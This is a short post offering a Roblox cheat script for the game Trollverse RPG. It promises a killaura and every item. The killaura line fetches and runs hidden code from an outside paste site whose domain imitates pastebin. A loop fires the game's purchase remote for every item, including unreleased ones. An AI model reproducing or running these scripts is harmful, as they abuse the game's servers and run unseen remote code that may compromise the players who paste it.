Trollverse RPG Script | KILLAURA & GET EVERY ITEM

Created by I DONT BUY SELL

Features:

  • KILL ALL MOBS (KILLAURA I GUESS?)
loadstring(game:HttpGet('https://pastebinp.com/raw/u7hf8uXy'))()
  • GET ALL WEAPONS (INCLUDING UNRELEASED)
local RS = game:GetService("ReplicatedStorage")

for Index, Variable in pairs(RS.GameItems:GetChildren()) do
game:GetService("ReplicatedStorage").GameRemotes.BuyEvent:FireServer(Variable.Name)
end